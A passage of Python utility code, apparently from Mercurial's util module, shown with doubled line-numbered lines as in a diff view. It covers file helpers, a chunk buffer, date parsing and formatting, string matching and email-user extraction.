1692 def tryunlink(f):
1692 def tryunlink(f):
1693 """Attempt to remove a file, ignoring ENOENT errors."""
1693 """Attempt to remove a file, ignoring ENOENT errors."""
1694 try:
1694 try:
1695 unlink(f)
1695 unlink(f)
1696 except OSError as e:
1696 except OSError as e:
1697 if e.errno != errno.ENOENT:
1697 if e.errno != errno.ENOENT:
1698 raise
1698 raise
1699
1699
1700 def makedirs(name, mode=None, notindexed=False):
1700 def makedirs(name, mode=None, notindexed=False):
1701 """recursive directory creation with parent mode inheritance
1701 """recursive directory creation with parent mode inheritance
1702
1702
1703 Newly created directories are marked as "not to be indexed by
1703 Newly created directories are marked as "not to be indexed by
1704 the content indexing service", if ``notindexed`` is specified
1704 the content indexing service", if ``notindexed`` is specified
1705 for "write" mode access.
1705 for "write" mode access.
1706 """
1706 """
1707 try:
1707 try:
1708 makedir(name, notindexed)
1708 makedir(name, notindexed)
1709 except OSError as err:
1709 except OSError as err:
1710 if err.errno == errno.EEXIST:
1710 if err.errno == errno.EEXIST:
1711 return
1711 return
1712 if err.errno != errno.ENOENT or not name:
1712 if err.errno != errno.ENOENT or not name:
1713 raise
1713 raise
1714 parent = os.path.dirname(os.path.abspath(name))
1714 parent = os.path.dirname(os.path.abspath(name))
1715 if parent == name:
1715 if parent == name:
1716 raise
1716 raise
1717 makedirs(parent, mode, notindexed)
1717 makedirs(parent, mode, notindexed)
1718 try:
1718 try:
1719 makedir(name, notindexed)
1719 makedir(name, notindexed)
1720 except OSError as err:
1720 except OSError as err:
1721 # Catch EEXIST to handle races
1721 # Catch EEXIST to handle races
1722 if err.errno == errno.EEXIST:
1722 if err.errno == errno.EEXIST:
1723 return
1723 return
1724 raise
1724 raise
1725 if mode is not None:
1725 if mode is not None:
1726 os.chmod(name, mode)
1726 os.chmod(name, mode)
1727
1727
1728 def readfile(path):
1728 def readfile(path):
1729 with open(path, 'rb') as fp:
1729 with open(path, 'rb') as fp:
1730 return fp.read()
1730 return fp.read()
1731
1731
1732 def writefile(path, text):
1732 def writefile(path, text):
1733 with open(path, 'wb') as fp:
1733 with open(path, 'wb') as fp:
1734 fp.write(text)
1734 fp.write(text)
1735
1735
1736 def appendfile(path, text):
1736 def appendfile(path, text):
1737 with open(path, 'ab') as fp:
1737 with open(path, 'ab') as fp:
1738 fp.write(text)
1738 fp.write(text)
1739
1739
1740 class chunkbuffer(object):
1740 class chunkbuffer(object):
1741 """Allow arbitrary sized chunks of data to be efficiently read from an
1741 """Allow arbitrary sized chunks of data to be efficiently read from an
1742 iterator over chunks of arbitrary size."""
1742 iterator over chunks of arbitrary size."""
1743
1743
1744 def __init__(self, in_iter):
1744 def __init__(self, in_iter):
1745 """in_iter is the iterator that's iterating over the input chunks."""
1745 """in_iter is the iterator that's iterating over the input chunks."""
1746 def splitbig(chunks):
1746 def splitbig(chunks):
1747 for chunk in chunks:
1747 for chunk in chunks:
1748 if len(chunk) > 2**20:
1748 if len(chunk) > 2**20:
1749 pos = 0
1749 pos = 0
1750 while pos < len(chunk):
1750 while pos < len(chunk):
1751 end = pos + 2 ** 18
1751 end = pos + 2 ** 18
1752 yield chunk[pos:end]
1752 yield chunk[pos:end]
1753 pos = end
1753 pos = end
1754 else:
1754 else:
1755 yield chunk
1755 yield chunk
1756 self.iter = splitbig(in_iter)
1756 self.iter = splitbig(in_iter)
1757 self._queue = collections.deque()
1757 self._queue = collections.deque()
1758 self._chunkoffset = 0
1758 self._chunkoffset = 0
1759
1759
1760 def read(self, l=None):
1760 def read(self, l=None):
1761 """Read L bytes of data from the iterator of chunks of data.
1761 """Read L bytes of data from the iterator of chunks of data.
1762 Returns less than L bytes if the iterator runs dry.
1762 Returns less than L bytes if the iterator runs dry.
1763
1763
1764 If size parameter is omitted, read everything"""
1764 If size parameter is omitted, read everything"""
1765 if l is None:
1765 if l is None:
1766 return ''.join(self.iter)
1766 return ''.join(self.iter)
1767
1767
1768 left = l
1768 left = l
1769 buf = []
1769 buf = []
1770 queue = self._queue
1770 queue = self._queue
1771 while left > 0:
1771 while left > 0:
1772 # refill the queue
1772 # refill the queue
1773 if not queue:
1773 if not queue:
1774 target = 2**18
1774 target = 2**18
1775 for chunk in self.iter:
1775 for chunk in self.iter:
1776 queue.append(chunk)
1776 queue.append(chunk)
1777 target -= len(chunk)
1777 target -= len(chunk)
1778 if target <= 0:
1778 if target <= 0:
1779 break
1779 break
1780 if not queue:
1780 if not queue:
1781 break
1781 break
1782
1782
1783 # The easy way to do this would be to queue.popleft(), modify the
1783 # The easy way to do this would be to queue.popleft(), modify the
1784 # chunk (if necessary), then queue.appendleft(). However, for cases
1784 # chunk (if necessary), then queue.appendleft(). However, for cases
1785 # where we read partial chunk content, this incurs 2 dequeue
1785 # where we read partial chunk content, this incurs 2 dequeue
1786 # mutations and creates a new str for the remaining chunk in the
1786 # mutations and creates a new str for the remaining chunk in the
1787 # queue. Our code below avoids this overhead.
1787 # queue. Our code below avoids this overhead.
1788
1788
1789 chunk = queue[0]
1789 chunk = queue[0]
1790 chunkl = len(chunk)
1790 chunkl = len(chunk)
1791 offset = self._chunkoffset
1791 offset = self._chunkoffset
1792
1792
1793 # Use full chunk.
1793 # Use full chunk.
1794 if offset == 0 and left >= chunkl:
1794 if offset == 0 and left >= chunkl:
1795 left -= chunkl
1795 left -= chunkl
1796 queue.popleft()
1796 queue.popleft()
1797 buf.append(chunk)
1797 buf.append(chunk)
1798 # self._chunkoffset remains at 0.
1798 # self._chunkoffset remains at 0.
1799 continue
1799 continue
1800
1800
1801 chunkremaining = chunkl - offset
1801 chunkremaining = chunkl - offset
1802
1802
1803 # Use all of unconsumed part of chunk.
1803 # Use all of unconsumed part of chunk.
1804 if left >= chunkremaining:
1804 if left >= chunkremaining:
1805 left -= chunkremaining
1805 left -= chunkremaining
1806 queue.popleft()
1806 queue.popleft()
1807 # offset == 0 is enabled by block above, so this won't merely
1807 # offset == 0 is enabled by block above, so this won't merely
1808 # copy via ``chunk[0:]``.
1808 # copy via ``chunk[0:]``.
1809 buf.append(chunk[offset:])
1809 buf.append(chunk[offset:])
1810 self._chunkoffset = 0
1810 self._chunkoffset = 0
1811
1811
1812 # Partial chunk needed.
1812 # Partial chunk needed.
1813 else:
1813 else:
1814 buf.append(chunk[offset:offset + left])
1814 buf.append(chunk[offset:offset + left])
1815 self._chunkoffset += left
1815 self._chunkoffset += left
1816 left -= chunkremaining
1816 left -= chunkremaining
1817
1817
1818 return ''.join(buf)
1818 return ''.join(buf)
1819
1819
1820 def filechunkiter(f, size=131072, limit=None):
1820 def filechunkiter(f, size=131072, limit=None):
1821 """Create a generator that produces the data in the file size
1821 """Create a generator that produces the data in the file size
1822 (default 131072) bytes at a time, up to optional limit (default is
1822 (default 131072) bytes at a time, up to optional limit (default is
1823 to read all data). Chunks may be less than size bytes if the
1823 to read all data). Chunks may be less than size bytes if the
1824 chunk is the last chunk in the file, or the file is a socket or
1824 chunk is the last chunk in the file, or the file is a socket or
1825 some other type of file that sometimes reads less data than is
1825 some other type of file that sometimes reads less data than is
1826 requested."""
1826 requested."""
1827 assert size >= 0
1827 assert size >= 0
1828 assert limit is None or limit >= 0
1828 assert limit is None or limit >= 0
1829 while True:
1829 while True:
1830 if limit is None:
1830 if limit is None:
1831 nbytes = size
1831 nbytes = size
1832 else:
1832 else:
1833 nbytes = min(limit, size)
1833 nbytes = min(limit, size)
1834 s = nbytes and f.read(nbytes)
1834 s = nbytes and f.read(nbytes)
1835 if not s:
1835 if not s:
1836 break
1836 break
1837 if limit:
1837 if limit:
1838 limit -= len(s)
1838 limit -= len(s)
1839 yield s
1839 yield s
1840
1840
1841 def makedate(timestamp=None):
1841 def makedate(timestamp=None):
1842 '''Return a unix timestamp (or the current time) as a (unixtime,
1842 '''Return a unix timestamp (or the current time) as a (unixtime,
1843 offset) tuple based off the local timezone.'''
1843 offset) tuple based off the local timezone.'''
1844 if timestamp is None:
1844 if timestamp is None:
1845 timestamp = time.time()
1845 timestamp = time.time()
1846 if timestamp < 0:
1846 if timestamp < 0:
1847 hint = _("check your clock")
1847 hint = _("check your clock")
1848 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1848 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1849 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1849 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1850 datetime.datetime.fromtimestamp(timestamp))
1850 datetime.datetime.fromtimestamp(timestamp))
1851 tz = delta.days * 86400 + delta.seconds
1851 tz = delta.days * 86400 + delta.seconds
1852 return timestamp, tz
1852 return timestamp, tz
1853
1853
1854 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1854 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1855 """represent a (unixtime, offset) tuple as a localized time.
1855 """represent a (unixtime, offset) tuple as a localized time.
1856 unixtime is seconds since the epoch, and offset is the time zone's
1856 unixtime is seconds since the epoch, and offset is the time zone's
1857 number of seconds away from UTC.
1857 number of seconds away from UTC.
1858
1858
1859 >>> datestr((0, 0))
1859 >>> datestr((0, 0))
1860 'Thu Jan 01 00:00:00 1970 +0000'
1860 'Thu Jan 01 00:00:00 1970 +0000'
1861 >>> datestr((42, 0))
1861 >>> datestr((42, 0))
1862 'Thu Jan 01 00:00:42 1970 +0000'
1862 'Thu Jan 01 00:00:42 1970 +0000'
1863 >>> datestr((-42, 0))
1863 >>> datestr((-42, 0))
1864 'Wed Dec 31 23:59:18 1969 +0000'
1864 'Wed Dec 31 23:59:18 1969 +0000'
1865 >>> datestr((0x7fffffff, 0))
1865 >>> datestr((0x7fffffff, 0))
1866 'Tue Jan 19 03:14:07 2038 +0000'
1866 'Tue Jan 19 03:14:07 2038 +0000'
1867 >>> datestr((-0x80000000, 0))
1867 >>> datestr((-0x80000000, 0))
1868 'Fri Dec 13 20:45:52 1901 +0000'
1868 'Fri Dec 13 20:45:52 1901 +0000'
1869 """
1869 """
1870 t, tz = date or makedate()
1870 t, tz = date or makedate()
1871 if "%1" in format or "%2" in format or "%z" in format:
1871 if "%1" in format or "%2" in format or "%z" in format:
1872 sign = (tz > 0) and "-" or "+"
1872 sign = (tz > 0) and "-" or "+"
1873 minutes = abs(tz) // 60
1873 minutes = abs(tz) // 60
1874 q, r = divmod(minutes, 60)
1874 q, r = divmod(minutes, 60)
1875 format = format.replace("%z", "%1%2")
1875 format = format.replace("%z", "%1%2")
1876 format = format.replace("%1", "%c%02d" % (sign, q))
1876 format = format.replace("%1", "%c%02d" % (sign, q))
1877 format = format.replace("%2", "%02d" % r)
1877 format = format.replace("%2", "%02d" % r)
1878 d = t - tz
1878 d = t - tz
1879 if d > 0x7fffffff:
1879 if d > 0x7fffffff:
1880 d = 0x7fffffff
1880 d = 0x7fffffff
1881 elif d < -0x80000000:
1881 elif d < -0x80000000:
1882 d = -0x80000000
1882 d = -0x80000000
1883 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1883 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1884 # because they use the gmtime() system call which is buggy on Windows
1884 # because they use the gmtime() system call which is buggy on Windows
1885 # for negative values.
1885 # for negative values.
1886 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1886 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1887 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1887 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1888 return s
1888 return s
1889
1889
1890 def shortdate(date=None):
1890 def shortdate(date=None):
1891 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1891 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1892 return datestr(date, format='%Y-%m-%d')
1892 return datestr(date, format='%Y-%m-%d')
1893
1893
1894 def parsetimezone(s):
1894 def parsetimezone(s):
1895 """find a trailing timezone, if any, in string, and return a
1895 """find a trailing timezone, if any, in string, and return a
1896 (offset, remainder) pair"""
1896 (offset, remainder) pair"""
1897
1897
1898 if s.endswith("GMT") or s.endswith("UTC"):
1898 if s.endswith("GMT") or s.endswith("UTC"):
1899 return 0, s[:-3].rstrip()
1899 return 0, s[:-3].rstrip()
1900
1900
1901 # Unix-style timezones [+-]hhmm
1901 # Unix-style timezones [+-]hhmm
1902 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1902 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1903 sign = (s[-5] == "+") and 1 or -1
1903 sign = (s[-5] == "+") and 1 or -1
1904 hours = int(s[-4:-2])
1904 hours = int(s[-4:-2])
1905 minutes = int(s[-2:])
1905 minutes = int(s[-2:])
1906 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1906 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1907
1907
1908 # ISO8601 trailing Z
1908 # ISO8601 trailing Z
1909 if s.endswith("Z") and s[-2:-1].isdigit():
1909 if s.endswith("Z") and s[-2:-1].isdigit():
1910 return 0, s[:-1]
1910 return 0, s[:-1]
1911
1911
1912 # ISO8601-style [+-]hh:mm
1912 # ISO8601-style [+-]hh:mm
1913 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1913 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1914 s[-5:-3].isdigit() and s[-2:].isdigit()):
1914 s[-5:-3].isdigit() and s[-2:].isdigit()):
1915 sign = (s[-6] == "+") and 1 or -1
1915 sign = (s[-6] == "+") and 1 or -1
1916 hours = int(s[-5:-3])
1916 hours = int(s[-5:-3])
1917 minutes = int(s[-2:])
1917 minutes = int(s[-2:])
1918 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1918 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1919
1919
1920 return None, s
1920 return None, s
1921
1921
1922 def strdate(string, format, defaults=None):
1922 def strdate(string, format, defaults=None):
1923 """parse a localized time string and return a (unixtime, offset) tuple.
1923 """parse a localized time string and return a (unixtime, offset) tuple.
1924 if the string cannot be parsed, ValueError is raised."""
1924 if the string cannot be parsed, ValueError is raised."""
1925 if defaults is None:
1925 if defaults is None:
1926 defaults = {}
1926 defaults = {}
1927
1927
1928 # NOTE: unixtime = localunixtime + offset
1928 # NOTE: unixtime = localunixtime + offset
1929 offset, date = parsetimezone(string)
1929 offset, date = parsetimezone(string)
1930
1930
1931 # add missing elements from defaults
1931 # add missing elements from defaults
1932 usenow = False # default to using biased defaults
1932 usenow = False # default to using biased defaults
1933 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1933 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1934 part = pycompat.bytestr(part)
1934 part = pycompat.bytestr(part)
1935 found = [True for p in part if ("%"+p) in format]
1935 found = [True for p in part if ("%"+p) in format]
1936 if not found:
1936 if not found:
1937 date += "@" + defaults[part][usenow]
1937 date += "@" + defaults[part][usenow]
1938 format += "@%" + part[0]
1938 format += "@%" + part[0]
1939 else:
1939 else:
1940 # We've found a specific time element, less specific time
1940 # We've found a specific time element, less specific time
1941 # elements are relative to today
1941 # elements are relative to today
1942 usenow = True
1942 usenow = True
1943
1943
1944 timetuple = time.strptime(encoding.strfromlocal(date),
1944 timetuple = time.strptime(encoding.strfromlocal(date),
1945 encoding.strfromlocal(format))
1945 encoding.strfromlocal(format))
1946 localunixtime = int(calendar.timegm(timetuple))
1946 localunixtime = int(calendar.timegm(timetuple))
1947 if offset is None:
1947 if offset is None:
1948 # local timezone
1948 # local timezone
1949 unixtime = int(time.mktime(timetuple))
1949 unixtime = int(time.mktime(timetuple))
1950 offset = unixtime - localunixtime
1950 offset = unixtime - localunixtime
1951 else:
1951 else:
1952 unixtime = localunixtime + offset
1952 unixtime = localunixtime + offset
1953 return unixtime, offset
1953 return unixtime, offset
1954
1954
1955 def parsedate(date, formats=None, bias=None):
1955 def parsedate(date, formats=None, bias=None):
1956 """parse a localized date/time and return a (unixtime, offset) tuple.
1956 """parse a localized date/time and return a (unixtime, offset) tuple.
1957
1957
1958 The date may be a "unixtime offset" string or in one of the specified
1958 The date may be a "unixtime offset" string or in one of the specified
1959 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1959 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1960
1960
1961 >>> parsedate(' today ') == parsedate(\
1961 >>> parsedate(' today ') == parsedate(\
1962 datetime.date.today().strftime('%b %d'))
1962 datetime.date.today().strftime('%b %d'))
1963 True
1963 True
1964 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1964 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1965 datetime.timedelta(days=1)\
1965 datetime.timedelta(days=1)\
1966 ).strftime('%b %d'))
1966 ).strftime('%b %d'))
1967 True
1967 True
1968 >>> now, tz = makedate()
1968 >>> now, tz = makedate()
1969 >>> strnow, strtz = parsedate('now')
1969 >>> strnow, strtz = parsedate('now')
1970 >>> (strnow - now) < 1
1970 >>> (strnow - now) < 1
1971 True
1971 True
1972 >>> tz == strtz
1972 >>> tz == strtz
1973 True
1973 True
1974 """
1974 """
1975 if bias is None:
1975 if bias is None:
1976 bias = {}
1976 bias = {}
1977 if not date:
1977 if not date:
1978 return 0, 0
1978 return 0, 0
1979 if isinstance(date, tuple) and len(date) == 2:
1979 if isinstance(date, tuple) and len(date) == 2:
1980 return date
1980 return date
1981 if not formats:
1981 if not formats:
1982 formats = defaultdateformats
1982 formats = defaultdateformats
1983 date = date.strip()
1983 date = date.strip()
1984
1984
1985 if date == 'now' or date == _('now'):
1985 if date == 'now' or date == _('now'):
1986 return makedate()
1986 return makedate()
1987 if date == 'today' or date == _('today'):
1987 if date == 'today' or date == _('today'):
1988 date = datetime.date.today().strftime('%b %d')
1988 date = datetime.date.today().strftime('%b %d')
1989 elif date == 'yesterday' or date == _('yesterday'):
1989 elif date == 'yesterday' or date == _('yesterday'):
1990 date = (datetime.date.today() -
1990 date = (datetime.date.today() -
1991 datetime.timedelta(days=1)).strftime('%b %d')
1991 datetime.timedelta(days=1)).strftime('%b %d')
1992
1992
1993 try:
1993 try:
1994 when, offset = map(int, date.split(' '))
1994 when, offset = map(int, date.split(' '))
1995 except ValueError:
1995 except ValueError:
1996 # fill out defaults
1996 # fill out defaults
1997 now = makedate()
1997 now = makedate()
1998 defaults = {}
1998 defaults = {}
1999 for part in ("d", "mb", "yY", "HI", "M", "S"):
1999 for part in ("d", "mb", "yY", "HI", "M", "S"):
2000 # this piece is for rounding the specific end of unknowns
2000 # this piece is for rounding the specific end of unknowns
2001 b = bias.get(part)
2001 b = bias.get(part)
2002 if b is None:
2002 if b is None:
2003 if part[0:1] in "HMS":
2003 if part[0:1] in "HMS":
2004 b = "00"
2004 b = "00"
2005 else:
2005 else:
2006 b = "0"
2006 b = "0"
2007
2007
2008 # this piece is for matching the generic end to today's date
2008 # this piece is for matching the generic end to today's date
2009 n = datestr(now, "%" + part[0:1])
2009 n = datestr(now, "%" + part[0:1])
2010
2010
2011 defaults[part] = (b, n)
2011 defaults[part] = (b, n)
2012
2012
2013 for format in formats:
2013 for format in formats:
2014 try:
2014 try:
2015 when, offset = strdate(date, format, defaults)
2015 when, offset = strdate(date, format, defaults)
2016 except (ValueError, OverflowError):
2016 except (ValueError, OverflowError):
2017 pass
2017 pass
2018 else:
2018 else:
2019 break
2019 break
2020 else:
2020 else:
2021 raise error.ParseError(_('invalid date: %r') % date)
2021 raise error.ParseError(_('invalid date: %r') % date)
2022 # validate explicit (probably user-specified) date and
2022 # validate explicit (probably user-specified) date and
2023 # time zone offset. values must fit in signed 32 bits for
2023 # time zone offset. values must fit in signed 32 bits for
2024 # current 32-bit linux runtimes. timezones go from UTC-12
2024 # current 32-bit linux runtimes. timezones go from UTC-12
2025 # to UTC+14
2025 # to UTC+14
2026 if when < -0x80000000 or when > 0x7fffffff:
2026 if when < -0x80000000 or when > 0x7fffffff:
2027 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2027 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2028 if offset < -50400 or offset > 43200:
2028 if offset < -50400 or offset > 43200:
2029 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2029 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2030 return when, offset
2030 return when, offset
2031
2031
2032 def matchdate(date):
2032 def matchdate(date):
2033 """Return a function that matches a given date match specifier
2033 """Return a function that matches a given date match specifier
2034
2034
2035 Formats include:
2035 Formats include:
2036
2036
2037 '{date}' match a given date to the accuracy provided
2037 '{date}' match a given date to the accuracy provided
2038
2038
2039 '<{date}' on or before a given date
2039 '<{date}' on or before a given date
2040
2040
2041 '>{date}' on or after a given date
2041 '>{date}' on or after a given date
2042
2042
2043 >>> p1 = parsedate("10:29:59")
2043 >>> p1 = parsedate("10:29:59")
2044 >>> p2 = parsedate("10:30:00")
2044 >>> p2 = parsedate("10:30:00")
2045 >>> p3 = parsedate("10:30:59")
2045 >>> p3 = parsedate("10:30:59")
2046 >>> p4 = parsedate("10:31:00")
2046 >>> p4 = parsedate("10:31:00")
2047 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2047 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2048 >>> f = matchdate("10:30")
2048 >>> f = matchdate("10:30")
2049 >>> f(p1[0])
2049 >>> f(p1[0])
2050 False
2050 False
2051 >>> f(p2[0])
2051 >>> f(p2[0])
2052 True
2052 True
2053 >>> f(p3[0])
2053 >>> f(p3[0])
2054 True
2054 True
2055 >>> f(p4[0])
2055 >>> f(p4[0])
2056 False
2056 False
2057 >>> f(p5[0])
2057 >>> f(p5[0])
2058 False
2058 False
2059 """
2059 """
2060
2060
2061 def lower(date):
2061 def lower(date):
2062 d = {'mb': "1", 'd': "1"}
2062 d = {'mb': "1", 'd': "1"}
2063 return parsedate(date, extendeddateformats, d)[0]
2063 return parsedate(date, extendeddateformats, d)[0]
2064
2064
2065 def upper(date):
2065 def upper(date):
2066 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2066 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2067 for days in ("31", "30", "29"):
2067 for days in ("31", "30", "29"):
2068 try:
2068 try:
2069 d["d"] = days
2069 d["d"] = days
2070 return parsedate(date, extendeddateformats, d)[0]
2070 return parsedate(date, extendeddateformats, d)[0]
2071 except Abort:
2071 except Abort:
2072 pass
2072 pass
2073 d["d"] = "28"
2073 d["d"] = "28"
2074 return parsedate(date, extendeddateformats, d)[0]
2074 return parsedate(date, extendeddateformats, d)[0]
2075
2075
2076 date = date.strip()
2076 date = date.strip()
2077
2077
2078 if not date:
2078 if not date:
2079 raise Abort(_("dates cannot consist entirely of whitespace"))
2079 raise Abort(_("dates cannot consist entirely of whitespace"))
2080 elif date[0] == "<":
2080 elif date[0] == "<":
2081 if not date[1:]:
2081 if not date[1:]:
2082 raise Abort(_("invalid day spec, use '<DATE'"))
2082 raise Abort(_("invalid day spec, use '<DATE'"))
2083 when = upper(date[1:])
2083 when = upper(date[1:])
2084 return lambda x: x <= when
2084 return lambda x: x <= when
2085 elif date[0] == ">":
2085 elif date[0] == ">":
2086 if not date[1:]:
2086 if not date[1:]:
2087 raise Abort(_("invalid day spec, use '>DATE'"))
2087 raise Abort(_("invalid day spec, use '>DATE'"))
2088 when = lower(date[1:])
2088 when = lower(date[1:])
2089 return lambda x: x >= when
2089 return lambda x: x >= when
2090 elif date[0] == "-":
2090 elif date[0] == "-":
2091 try:
2091 try:
2092 days = int(date[1:])
2092 days = int(date[1:])
2093 except ValueError:
2093 except ValueError:
2094 raise Abort(_("invalid day spec: %s") % date[1:])
2094 raise Abort(_("invalid day spec: %s") % date[1:])
2095 if days < 0:
2095 if days < 0:
2096 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2096 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2097 % date[1:])
2097 % date[1:])
2098 when = makedate()[0] - days * 3600 * 24
2098 when = makedate()[0] - days * 3600 * 24
2099 return lambda x: x >= when
2099 return lambda x: x >= when
2100 elif " to " in date:
2100 elif " to " in date:
2101 a, b = date.split(" to ")
2101 a, b = date.split(" to ")
2102 start, stop = lower(a), upper(b)
2102 start, stop = lower(a), upper(b)
2103 return lambda x: x >= start and x <= stop
2103 return lambda x: x >= start and x <= stop
2104 else:
2104 else:
2105 start, stop = lower(date), upper(date)
2105 start, stop = lower(date), upper(date)
2106 return lambda x: x >= start and x <= stop
2106 return lambda x: x >= start and x <= stop
2107
2107
2108 def stringmatcher(pattern, casesensitive=True):
2108 def stringmatcher(pattern, casesensitive=True):
2109 """
2109 """
2110 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2110 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2111 returns the matcher name, pattern, and matcher function.
2111 returns the matcher name, pattern, and matcher function.
2112 missing or unknown prefixes are treated as literal matches.
2112 missing or unknown prefixes are treated as literal matches.
2113
2113
2114 helper for tests:
2114 helper for tests:
2115 >>> def test(pattern, *tests):
2115 >>> def test(pattern, *tests):
2116 ... kind, pattern, matcher = stringmatcher(pattern)
2116 ... kind, pattern, matcher = stringmatcher(pattern)
2117 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2117 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2118 >>> def itest(pattern, *tests):
2118 >>> def itest(pattern, *tests):
2119 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2119 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2120 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2120 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2121
2121
2122 exact matching (no prefix):
2122 exact matching (no prefix):
2123 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2123 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2124 ('literal', 'abcdefg', [False, False, True])
2124 ('literal', 'abcdefg', [False, False, True])
2125
2125
2126 regex matching ('re:' prefix)
2126 regex matching ('re:' prefix)
2127 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2127 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2128 ('re', 'a.+b', [False, False, True])
2128 ('re', 'a.+b', [False, False, True])
2129
2129
2130 force exact matches ('literal:' prefix)
2130 force exact matches ('literal:' prefix)
2131 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2131 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2132 ('literal', 're:foobar', [False, True])
2132 ('literal', 're:foobar', [False, True])
2133
2133
2134 unknown prefixes are ignored and treated as literals
2134 unknown prefixes are ignored and treated as literals
2135 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2135 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2136 ('literal', 'foo:bar', [False, False, True])
2136 ('literal', 'foo:bar', [False, False, True])
2137
2137
2138 case insensitive regex matches
2138 case insensitive regex matches
2139 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2139 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2140 ('re', 'A.+b', [False, False, True])
2140 ('re', 'A.+b', [False, False, True])
2141
2141
2142 case insensitive literal matches
2142 case insensitive literal matches
2143 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2143 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2144 ('literal', 'ABCDEFG', [False, False, True])
2144 ('literal', 'ABCDEFG', [False, False, True])
2145 """
2145 """
2146 if pattern.startswith('re:'):
2146 if pattern.startswith('re:'):
2147 pattern = pattern[3:]
2147 pattern = pattern[3:]
2148 try:
2148 try:
2149 flags = 0
2149 flags = 0
2150 if not casesensitive:
2150 if not casesensitive:
2151 flags = remod.I
2151 flags = remod.I
2152 regex = remod.compile(pattern, flags)
2152 regex = remod.compile(pattern, flags)
2153 except remod.error as e:
2153 except remod.error as e:
2154 raise error.ParseError(_('invalid regular expression: %s')
2154 raise error.ParseError(_('invalid regular expression: %s')
2155 % e)
2155 % e)
2156 return 're', pattern, regex.search
2156 return 're', pattern, regex.search
2157 elif pattern.startswith('literal:'):
2157 elif pattern.startswith('literal:'):
2158 pattern = pattern[8:]
2158 pattern = pattern[8:]
2159
2159
2160 match = pattern.__eq__
2160 match = pattern.__eq__
2161
2161
2162 if not casesensitive:
2162 if not casesensitive:
2163 ipat = encoding.lower(pattern)
2163 ipat = encoding.lower(pattern)
2164 match = lambda s: ipat == encoding.lower(s)
2164 match = lambda s: ipat == encoding.lower(s)
2165 return 'literal', pattern, match
2165 return 'literal', pattern, match
2166
2166
2167 def shortuser(user):
2167 def shortuser(user):
2168 """Return a short representation of a user name or email address."""
2168 """Return a short representation of a user name or email address."""
2169 f = user.find('@')
2169 f = user.find('@')
2170 if f >= 0:
2170 if f >= 0:
2171 user = user[:f]
2171 user = user[:f]
2172 f = user.find('<')
2172 f = user.find('<')
2173 if f >= 0:
2173 if f >= 0:
2174 user = user[f + 1:]
2174 user = user[f + 1:]
2175 f = user.find(' ')
2175 f = user.find(' ')
2176 if f >= 0:
2176 if f >= 0:
2177 user = user[:f]
2177 user = user[:f]
2178 f = user.find('.')
2178 f = user.find('.')
2179 if f >= 0:
2179 if f >= 0:
2180 user = user[:f]
2180 user = user[:f]
2181 return user
2181 return user
2182
2182
2183 def emailuser(user):
2183 def emailuser(user):
2184 """Return the user portion of an email address."""
2184 """Return the user portion of an email address."""
2185 f = user.find('@')
2185 f = user.find('@')
2186 if f >= 0:
2186 if f >= 0:
2187 user = user[:f]
2187 user = user[:f]
2188 f = user.find('<')
2188 f = user.find('<')
2189 if f >= 0:
2189 if f >= 0:
2190 user = user[f + 1:]
2190 user = user[f + 1:]
2191 return user
2191 return user
2192
2192
2193 def email(author):
2193 def email(author):
